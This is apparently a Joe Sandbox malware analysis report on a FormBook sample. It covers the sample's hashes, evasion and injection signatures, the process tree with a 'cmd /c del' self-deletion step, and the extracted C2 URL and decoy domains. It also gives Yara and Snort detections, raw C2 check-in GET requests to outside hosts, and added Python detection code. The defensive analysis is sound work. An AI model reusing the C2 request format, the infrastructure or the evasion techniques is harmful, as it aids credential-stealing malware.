
Windows Analysis Report: Wellis Inquiry.exe

Overview

General Information

Sample Name: Wellis Inquiry.exe
Analysis ID: 502627
MD5: c357a8010e661a49df2e813bd22590b6
SHA1: 08ecd005e1449ec97d0405e83649686ae35f6286
SHA256: eef137583da6deb4a1be9882cede6cec5112b74ae79c0773f45b13346c5b2890
Tags: exe

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Performs DNS queries to domains with low reputation
Self deletion via cmd delete
.NET source code contains potential unpacker
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Process Tree

  • System is w10x64
  • Wellis Inquiry.exe (PID: 7036 cmdline: 'C:\Users\user\Desktop\Wellis Inquiry.exe' MD5: C357A8010E661A49DF2E813BD22590B6)
    • Wellis Inquiry.exe (PID: 1680 cmdline: C:\Users\user\Desktop\Wellis Inquiry.exe MD5: C357A8010E661A49DF2E813BD22590B6)
      • explorer.exe (PID: 3424 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cmmon32.exe (PID: 5328 cmdline: C:\Windows\SysWOW64\cmmon32.exe MD5: 2879B30A164B9F7671B5E6B2E9F8DFDA)
          • cmd.exe (PID: 7092 cmdline: /c del 'C:\Users\user\Desktop\Wellis Inquiry.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6796 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
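The tree above is the process-level footprint of this sample: the .NET stub relaunches its own image (the copy that gets hollowed), the injected explorer.exe starts a 32-bit host binary from SysWOW64 (cmmon32.exe), and that host spawns cmd.exe /c del against the original sample path. The following is an added example, not part of the Joe Sandbox report, that reconstructs the tree from constructed Sysmon-style process-creation records modelled on the PIDs and command lines shown and raises an alert for each of the three patterns. The event field names, explorer.exe's parent PID (1000), cmd.exe's image path and the double quotes around the del target are assumptions; the sandbox renders that argument with single quotes.

```python
import re
from collections import defaultdict

# Constructed Sysmon-style (Event ID 1) process-creation records modelled on the
# report's process tree: same PIDs, images and command lines. Not real telemetry.
# The sandbox draws explorer.exe under the sample because the sample injected into
# it; a process-creation log shows explorer.exe with its normal parent (PID 1000 is
# assumed here), so no rule below relies on that edge. cmd.exe's image path and the
# double quotes around the del target are assumed.
EVENTS = [
    {"pid": 3424, "ppid": 1000, "image": r"C:\Windows\Explorer.EXE",
     "cmdline": r"C:\Windows\Explorer.EXE"},
    {"pid": 7036, "ppid": 3424, "image": r"C:\Users\user\Desktop\Wellis Inquiry.exe",
     "cmdline": r'"C:\Users\user\Desktop\Wellis Inquiry.exe"'},
    {"pid": 1680, "ppid": 7036, "image": r"C:\Users\user\Desktop\Wellis Inquiry.exe",
     "cmdline": r"C:\Users\user\Desktop\Wellis Inquiry.exe"},
    {"pid": 5328, "ppid": 3424, "image": r"C:\Windows\SysWOW64\cmmon32.exe",
     "cmdline": r"C:\Windows\SysWOW64\cmmon32.exe"},
    {"pid": 7092, "ppid": 5328, "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": r'/c del "C:\Users\user\Desktop\Wellis Inquiry.exe"'},
    {"pid": 6796, "ppid": 7092, "image": r"C:\Windows\System32\conhost.exe",
     "cmdline": r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"},
]

# `del`, optional switches such as /f /q, then an optionally quoted target path.
DEL_RE = re.compile(r'(?i)\bdel\b((?:\s+/\w+)*)\s+["\']?(.+?)["\']?\s*$')


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def del_target(cmdline):
    """Return the path removed by a `cmd /c del ...` command line, or None."""
    m = DEL_RE.search(cmdline)
    return m.group(2) if m else None


def analyze(events):
    """Apply three FormBook-style process rules and return the alerts raised."""
    by_pid = {e["pid"]: e for e in events}
    pids_by_image = defaultdict(list)          # image path -> every PID that ran it
    for e in events:
        pids_by_image[e["image"].lower()].append(e["pid"])

    alerts = []
    for e in events:
        parent = by_pid.get(e["ppid"])
        image = e["image"].lower()
        bare_cmdline = e["cmdline"].strip().strip('"').lower()

        # Rule 1 (heuristic): explorer.exe starts a SysWOW64 binary with no
        # arguments. An injected explorer.exe picking a 32-bit host for the payload
        # looks like this; a user launching a 32-bit tool from the shell can too.
        if (parent and basename(parent["image"]) == "explorer.exe"
                and image.startswith("c:\\windows\\syswow64\\")
                and bare_cmdline == image):
            alerts.append({"rule": "explorer_spawns_syswow64_binary", "pid": e["pid"]})

        # Rule 2 (heuristic): a process relaunches its own image, the usual shape of
        # a loader that hollows a suspended copy of itself.
        if parent and parent["image"].lower() == image:
            alerts.append({"rule": "self_relaunch", "pid": e["pid"],
                           "parent": parent["pid"]})

        # Rule 3: cmd.exe deletes a file that was itself executed in this window.
        if basename(e["image"]) == "cmd.exe":
            target = del_target(e["cmdline"])
            if target and target.lower() in pids_by_image:
                alerts.append({"rule": "self_delete_via_cmd", "pid": e["pid"],
                               "target": target,
                               "deleted_image_pids": pids_by_image[target.lower()]})
    return alerts


if __name__ == "__main__":
    for alert in analyze(EVENTS):
        print(alert)
```

Rule 3 is the one worth alerting on by itself: a cmd.exe deleting a file whose path matches an image that ran moments earlier is rare in legitimate activity, and it links the deletion back to PIDs 7036 and 1680 for triage. Rules 1 and 2 are noisy on their own and are better used to raise the score of a chain that already contains rule 3, or correlated with the injection events (CreateRemoteThread / APC queueing) that the report lists under the signatures.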

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.psychedeliccosmetics.com/ag9v/"], "decoy": ["wordmagicshow.com", "dogparkdate.com", "quickcarehomeopathic.com", "azwar.net", "louisle1909.xyz", "section8lv.com", "felineness.com", "2888sy.com", "wadashoot.com", "kittyuniverse.com", "blushroses.com", "alaskangeneral.com", "yumoo.design", "7xkfic.com", "891827.com", "uspress1.com", "aceserial.xyz", "muellerconfidence.com", "eramakport.com", "tipsandtoesnewton.com", "withph.net", "kravesproet.quest", "restaurantemesana.com", "ghostpunk.art", "cobere9.com", "darshanshastra.com", "barnhsartcrane.com", "richartware.com", "welcomprom2.com", "plantvsundeadhelp.com", "hotsatisfy.com", "fullhindimovies.com", "beautynaturalcosmeticslk.com", "googglo.com", "hongyang98.com", "elishevazz.com", "ebookgratis.online", "urbanyinyoga.com", "sojuicybar.com", "seheon.email", "pokemongosrf.com", "catchytravel.com", "stonecoldice.net", "betinle137.com", "platinumridge.art", "agoodhotel.com", "preventbiotech.com", "ebonyslivestockservice.online", "billionairesboat.com", "dollpartyla.com", "naufragant.com", "cat2628.top", "ietwatiomlan.quest", "soulful-simplicity.com", "kalmmed.com", "luxuryray.com", "pknox.net", "687410.com", "blackmagiccomics.com", "usaworkerscorporation.com", "ovmfinacial.com", "marunouchi1.com", "feshwal.com", "qupontgon.quest"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author
00000004.00000000.715332371.000000000E4B9000.00000040.00020000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000004.00000000.715332371.000000000E4B9000.00000040.00020000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  Strings:
  • 0x46b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x41a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x47b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x9ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0xac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000004.00000000.715332371.000000000E4B9000.00000040.00020000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  Strings:
  • 0x6ad9:$sqlite3step: 68 34 1C 7B E1
  • 0x6bec:$sqlite3step: 68 34 1C 7B E1
  • 0x6b08:$sqlite3text: 68 38 2A 90 C5
  • 0x6c2d:$sqlite3text: 68 38 2A 90 C5
  • 0x6b1b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x6c43:$sqlite3blob: 68 53 D8 7F 8C
00000003.00000002.745846154.0000000001090000.00000040.00020000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000003.00000002.745846154.0000000001090000.00000040.00020000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  Strings:
  • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(24 entries in total; only the first are listed)

      Unpacked PEs

Source | Rule | Description | Author
3.2.Wellis Inquiry.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
3.2.Wellis Inquiry.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  Strings:
  • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
3.2.Wellis Inquiry.exe.400000.0.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  Strings:
  • 0x16ad9:$sqlite3step: 68 34 1C 7B E1
  • 0x16bec:$sqlite3step: 68 34 1C 7B E1
  • 0x16b08:$sqlite3text: 68 38 2A 90 C5
  • 0x16c2d:$sqlite3text: 68 38 2A 90 C5
  • 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
3.2.Wellis Inquiry.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
3.2.Wellis Inquiry.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  Strings:
  • 0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x7ba2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x138b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x133a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x139b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x13b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x85ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1261c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x9332:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x18da7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x19e4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(8 entries in total; only the first are listed)

          Sigma Overview

          No Sigma rule has matched

          Jbx Signature Overview

          AV Detection:

Found malware configuration
Source: 00000003.00000002.745846154.0000000001090000.00000040.00020000.sdmp | Malware Configuration Extractor: FormBook (the configuration listed under Malware Configuration above)
Yara detected FormBook
Source: Yara match | File source: 3.2.Wellis Inquiry.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.Wellis Inquiry.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Wellis Inquiry.exe.44b68c0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Wellis Inquiry.exe.446c2a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000004.00000000.715332371.000000000E4B9000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.745846154.0000000001090000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000000.699912453.000000000E4B9000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.922603929.0000000002D20000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.921975794.0000000000360000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.922486626.0000000002C20000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.745321491.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.745670982.0000000000C10000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.671146888.0000000004349000.00000004.00000001.sdmp, type: MEMORY
Source: 3.2.Wellis Inquiry.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: Wellis Inquiry.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: Wellis Inquiry.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: cmmon32.pdb | source: Wellis Inquiry.exe, 00000003.00000002.747156139.00000000031A0000.00000040.00020000.sdmp
Source: Binary string: cmmon32.pdbGCTL | source: Wellis Inquiry.exe, 00000003.00000002.747156139.00000000031A0000.00000040.00020000.sdmp
Source: Binary string: wntdll.pdbUGP | source: Wellis Inquiry.exe, 00000003.00000002.746125583.00000000012AF000.00000040.00000001.sdmp, cmmon32.exe, 0000000B.00000002.922767322.00000000046B0000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb | source: Wellis Inquiry.exe, cmmon32.exe
Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Code function: 4x nop then pop edi
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 4x nop then pop edi

          Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49808 -> 183.90.240.3:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49808 -> 183.90.240.3:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49808 -> 183.90.240.3:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49814 -> 34.102.136.180:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49814 -> 34.102.136.180:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49814 -> 34.102.136.180:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49818 -> 151.106.117.36:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49818 -> 151.106.117.36:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49818 -> 151.106.117.36:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49842 -> 199.59.242.153:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49842 -> 199.59.242.153:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49842 -> 199.59.242.153:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe | Domain query: www.marunouchi1.com
Source: C:\Windows\explorer.exe | Network Connect: 183.90.240.3 80
Source: C:\Windows\explorer.exe | Network Connect: 151.106.117.36 80
Source: C:\Windows\explorer.exe | Domain query: www.richartware.com
Source: C:\Windows\explorer.exe | Network Connect: 23.227.38.74 80
Source: C:\Windows\explorer.exe | Domain query: www.ebookgratis.online
Source: C:\Windows\explorer.exe | Network Connect: 199.59.242.153 80
Source: C:\Windows\explorer.exe | Domain query: www.ovmfinacial.com
Source: C:\Windows\explorer.exe | Network Connect: 34.102.136.180 80
Source: C:\Windows\explorer.exe | Domain query: www.blackmagiccomics.com
Source: C:\Windows\explorer.exe | Domain query: www.psychedeliccosmetics.com
Source: C:\Windows\explorer.exe | Domain query: www.dollpartyla.com
Source: C:\Windows\explorer.exe | Domain query: www.aceserial.xyz
Source: C:\Windows\explorer.exe | Network Connect: 104.21.2.218 80
Performs DNS queries to domains with low reputation
Source: C:\Windows\explorer.exe | DNS query: www.aceserial.xyz
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor | URLs: www.psychedeliccosmetics.com/ag9v/
Source: Joe Sandbox View | ASN Name: BODIS-NJUS BODIS-NJUS
Source: Joe Sandbox View | ASN Name: SAKURA-CSAKURAInternetIncJP SAKURA-CSAKURAInternetIncJP
Source: global traffic | HTTP traffic detected: GET /ag9v/?9rq=RZxJGV19NODz6/sPl50rcsjPCmhff0B2cQNSD9XNHlzuAkz3tWy1tz3gnsv2II3OKfXw&BFQ=5jI0jhMHA0hx_ HTTP/1.1 | Host: www.marunouchi1.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /ag9v/?9rq=B7neoLnMPG5T4Lq1mgXXW304ryc0TDTB8h8f/WhOEZEEcWgrsd/ecy8wgWRxVB11aSvz&BFQ=5jI0jhMHA0hx_ HTTP/1.1 | Host: www.psychedeliccosmetics.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /ag9v/?9rq=8aghxAEFV3UFLmLUmwXrjnry4I8PGHpXxFVOvh2n7b9U9R7NlIya57CFUx9pJqwzlAw7&BFQ=5jI0jhMHA0hx_ HTTP/1.1 | Host: www.aceserial.xyz | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /ag9v/?9rq=VDs0Hn8x6Kri7C1Uc2aKLXPFP0feJseWm2OJ8K++Wp+sqWdpvRON2LvjpBxhi0u2NedX&BFQ=5jI0jhMHA0hx_ HTTP/1.1 | Host: www.ebookgratis.online | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /ag9v/?9rq=vpuErUH2OwLAPGAltxg3/Zj6XscnxJenLEapnG3NwgRlKVIYyl0HnfsKneQfORBHqYbR&BFQ=5jI0jhMHA0hx_ HTTP/1.1 | Host: www.ovmfinacial.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /ag9v/?9rq=K9/CDnPG5wdyl4CHzmgShg3gLBJ4YNT1Y6jAhZ/FXp8/egWH1BEUOuCtjJEICRxztW+Z&BFQ=5jI0jhMHA0hx_ HTTP/1.1 | Host: www.dollpartyla.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: Joe Sandbox View | IP Address: 199.59.242.153 199.59.242.153
Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: openresty | Date: Thu, 14 Oct 2021 05:29:51 GMT | Content-Type: text/html | Content-Length: 275 | ETag: "615f93b1-113" | Via: 1.1 google | Connection: close | Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Content-Type: text/html | Cache-Control: no-cache, no-store, must-revalidate | Pragma: no-cache | Expires: 0 | Server: BitNinja Captcha Server | Date: Thu, 14 Oct 2021 05:29:57 GMT | Content-Length: 13724 | Connection: close | Data Ascii: <!DOCTYPE HTML><html lang="en-US"> <head> <meta charset="UTF-8" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta name="robots" content="noindex, nofollow" /><meta name="keywords" content="joomla, Joomla, joomla 1.5, wordpress 2.5, Drupal" /><meta name="description" content="Joomla!" /><meta name="generator" content="Joomla! 1.5 - Open Source Content Management" /><meta name="generator" content="WordPress 2.5" /> <meta http-equiv="Content-Type" content="text/html;charset=UTF-8" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" /> <title>Waiting for the redirectiron...</title> <style type="text/css"> body {background-color: #ffffff; font-family: "Helvetica Neue", Helvetica,Arial,sans-serif;} html, body {width: 100%; height: 100%; margin: 0; padding: 0;} [body truncated in report]
Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Date: Thu, 14 Oct 2021 05:30:28 GMT | Content-Type: text/html | Transfer-Encoding: chunked | Connection: close | Vary: Accept-Encoding | X-Sorting-Hat-PodId: 189 | X-Sorting-Hat-ShopId: 59880997054 | X-Request-ID: ff951e54-78cb-49de-931e-6e9b39ead4a9 | X-Permitted-Cross-Domain-Policies: none | X-XSS-Protection: 1; mode=block | X-Download-Options: noopen | X-Content-Type-Options: nosniff | X-Dc: gcp-europe-west1 | CF-Cache-Status: DYNAMIC | Server: cloudflare | CF-RAY: 69de6a78386b698b-FRA | alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 | Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content="never" /> <title>Access denied</title> <style type="text/css"> *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#F1F1F1;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}a:hover{border-bottom-color:#A9A9A9}h1{font-size:1.8rem;font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-height:100vh;flex-direction:col [body truncated in report]
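The six GETs above send the same path, /ag9v/, to six different Host values. Only www.psychedeliccosmetics.com is the configured C2; the other five are entries from the decoy list in the Malware Configuration section, and several of them answered with a 403 from an unrelated web host. The traffic itself does not distinguish the two, only a lookup against the extracted configuration does. The following is an added example, not part of the Joe Sandbox report and not FormBook's own code, that loads the C2 entry and the contacted decoys from that configuration, parses request lines constructed from the GETs above, labels each host, and checks the two regularities visible above: one path for every host, and a second query parameter whose value does not change across hosts. The decoy subset, the request tuples, the www. prefixing rule and the output field names are assumptions made for this example.

```python
from collections import defaultdict
from urllib.parse import urlsplit

# C2 entry and the contacted decoys, copied from the configuration extracted in
# the report (the full decoy list there has 64 entries).
CONFIG = {
    "C2 list": ["www.psychedeliccosmetics.com/ag9v/"],
    "decoy": ["marunouchi1.com", "aceserial.xyz", "ebookgratis.online",
              "ovmfinacial.com", "dollpartyla.com", "wordmagicshow.com"],
}

# Constructed (request line, Host header) pairs mirroring the six GETs above.
REQUESTS = [
    ("GET /ag9v/?9rq=RZxJGV19NODz6/sPl50rcsjPCmhff0B2cQNSD9XNHlzuAkz3tWy1tz3gnsv2II3OKfXw&BFQ=5jI0jhMHA0hx_ HTTP/1.1",
     "www.marunouchi1.com"),
    ("GET /ag9v/?9rq=B7neoLnMPG5T4Lq1mgXXW304ryc0TDTB8h8f/WhOEZEEcWgrsd/ecy8wgWRxVB11aSvz&BFQ=5jI0jhMHA0hx_ HTTP/1.1",
     "www.psychedeliccosmetics.com"),
    ("GET /ag9v/?9rq=8aghxAEFV3UFLmLUmwXrjnry4I8PGHpXxFVOvh2n7b9U9R7NlIya57CFUx9pJqwzlAw7&BFQ=5jI0jhMHA0hx_ HTTP/1.1",
     "www.aceserial.xyz"),
    ("GET /ag9v/?9rq=VDs0Hn8x6Kri7C1Uc2aKLXPFP0feJseWm2OJ8K++Wp+sqWdpvRON2LvjpBxhi0u2NedX&BFQ=5jI0jhMHA0hx_ HTTP/1.1",
     "www.ebookgratis.online"),
    ("GET /ag9v/?9rq=vpuErUH2OwLAPGAltxg3/Zj6XscnxJenLEapnG3NwgRlKVIYyl0HnfsKneQfORBHqYbR&BFQ=5jI0jhMHA0hx_ HTTP/1.1",
     "www.ovmfinacial.com"),
    ("GET /ag9v/?9rq=K9/CDnPG5wdyl4CHzmgShg3gLBJ4YNT1Y6jAhZ/FXp8/egWH1BEUOuCtjJEICRxztW+Z&BFQ=5jI0jhMHA0hx_ HTTP/1.1",
     "www.dollpartyla.com"),
]


def config_hosts(cfg):
    """Map every hostname the configuration names to 'c2' or 'decoy'."""
    labels, c2_paths = {}, set()
    for url in cfg["C2 list"]:
        parts = urlsplit("http://" + url)
        labels[parts.hostname] = "c2"
        c2_paths.add(parts.path)
    for domain in cfg["decoy"]:
        # Decoys are stored as bare domains while every Host header observed above
        # carries a www. prefix (assumption: both spellings are worth indexing).
        for name in (domain, "www." + domain):
            labels.setdefault(name, "decoy")
    return labels, c2_paths


def parse_request(line, host):
    """Split a request line into method, path and an ordered parameter dict.
    Values are kept raw: '+' and '/' inside 9rq are payload, not URL encoding."""
    method, target, _version = line.split(" ", 2)
    parts = urlsplit(target)
    params = {}
    for pair in (parts.query.split("&") if parts.query else []):
        key, _, value = pair.partition("=")
        params[key] = value
    return {"method": method, "host": host, "path": parts.path, "params": params}


def correlate(cfg, requests):
    """Label each contacted host and summarise the requests per URI path."""
    labels, c2_paths = config_hosts(cfg)
    verdicts, by_path = {}, defaultdict(list)
    for line, host in requests:
        req = parse_request(line, host)
        verdicts[host] = labels.get(host, "unknown")
        by_path[req["path"]].append(req)

    summary = {}
    for path, reqs in by_path.items():
        name_sets = {tuple(r["params"]) for r in reqs}
        # Observed above: the first value differs per request, the second does not.
        second_values = {list(r["params"].values())[1]
                         for r in reqs if len(r["params"]) > 1}
        summary[path] = {
            "hosts": [r["host"] for r in reqs],
            "param_names": sorted(name_sets),
            "second_param_constant": len(second_values) == 1,
            "path_in_c2_config": path in c2_paths,
        }
    return verdicts, summary


def blocklist(verdicts):
    """Hosts worth blocking outright: the configured C2, not the decoys."""
    return sorted(h for h, label in verdicts.items() if label == "c2")


if __name__ == "__main__":
    verdicts, summary = correlate(CONFIG, REQUESTS)
    print(verdicts)
    print(summary)
    print("block:", blocklist(verdicts))
```

The decoys are other people's web sites, so they belong in a watchlist for correlation rather than in a block rule, and the six hosts here are only the ones this sandbox run happened to reach out of the 64 configured. For hunting in proxy logs without the configuration, the shape that the summary measures is the usable signal: the same short path requested from one client against many unrelated hosts within seconds, each as a single Connection: close GET that, as the signature list above notes, carries no User-Agent.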
Source: Wellis Inquiry.exe, 00000000.00000003.655430474.0000000006353000.00000004.00000001.sdmp | String found in binary or memory: http://en.wikip
Source: Wellis Inquiry.exe, 00000000.00000002.672668487.0000000007542000.00000004.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
Source: Wellis Inquiry.exe, 00000000.00000002.672668487.0000000007542000.00000004.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: Wellis Inquiry.exe, 00000000.00000003.659186250.0000000006334000.00000004.00000001.sdmp | String found in binary or memory: http://www.ascendercorp.com/typedesigners.html
